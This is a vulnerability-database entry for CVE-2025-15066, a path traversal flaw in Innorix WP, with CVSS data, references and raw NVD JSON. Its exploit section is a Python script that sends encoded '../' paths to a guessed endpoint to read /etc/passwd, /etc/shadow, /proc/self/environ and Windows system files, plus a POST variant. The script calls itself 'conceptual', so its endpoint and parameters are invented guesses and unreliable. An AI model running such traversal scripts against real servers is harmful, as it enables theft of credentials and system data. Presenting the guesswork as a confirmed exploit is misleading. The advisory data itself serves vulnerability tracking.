CVE-2025-15066

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Missing Authorization vulnerability in Innorix WP allows Path Traversal.This issue affects Innorix WP from All versions If the "exam" directory exists under the directory where the product is installed (ex: innorix/exam)

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Innorix WP 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15066 PoC - Path Traversal in Innorix WP
# Note: This is a conceptual PoC based on the vulnerability description
# The actual exploitation depends on the specific endpoint

import requests
import urllib.parse

target_url = "http://target-server/innorix/exam/"

# List of common sensitive files to attempt to read
target_files = [
    "../../../../etc/passwd",
    "../../../../windows/win.ini",
    "../../../../boot.ini",
    "../../../../proc/self/environ",
    "../../../../etc/shadow",
    "../../../../../../windows/system32/drivers/etc/hosts"
]

print("CVE-2025-15066 Path Traversal PoC")
print("Target: Innorix WP")
print("-" * 50)

for file_path in target_files:
    # Encode the path traversal sequence
    encoded_path = urllib.parse.quote(file_path, safe='')
    
    # Construct the full URL
    url = target_url + encoded_path
    
    print(f"\nTesting: {file_path}")
    print(f"URL: {url}")
    
    try:
        response = requests.get(url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: File content retrieved ({len(response.text)} bytes)")
            print("-" * 30)
            print(response.text[:500])  # Print first 500 chars
        elif response.status_code == 404:
            print(f"[-] Not found or path not accessible")
        else:
            print(f"[*] Status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

# Example of reading specific configuration files
print("\n" + "=" * 50)
print("Extended PoC with POST request")
print("=" * 50)

# If the application accepts POST requests with file parameters
post_data = {
    "file": "../../../../etc/passwd",
    "action": "download"
}

try:
    response = requests.post(target_url, data=post_data, timeout=10)
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Confirmed vulnerable - Sensitive file content exposed")
except:
    print("[-] POST request did not return expected results")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15066
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15066
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15066/
[4] VulDB https://vuldb.com/cve/CVE-2025-15066
[5] https://www.gnit.co.kr/software/innorix_product.html
[6] https://www.innorix.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15066", "sourceIdentifier": "09832df1-09c1-45b4-8a85-16c601d30feb", "published": "2025-12-29T01:15:52.990", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Missing Authorization vulnerability in Innorix WP allows Path Traversal.This issue affects Innorix WP from All versions If the \"exam\" directory exists under the directory where the product is installed (ex: innorix/exam)"}], "metrics": {"cvssMetricV40": [{"source": "09832df1-09c1-45b4-8a85-16c601d30feb", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "09832df1-09c1-45b4-8a85-16c601d30feb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "09832df1-09c1-45b4-8a85-16c601d30feb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.gnit.co.kr/software/innorix_product.html", "source": "09832df1-09c1-45b4-8a85-16c601d30feb"}, {"url": "https://www.innorix.com/", "source": "09832df1-09c1-45b4-8a85-16c601d30feb"}]}}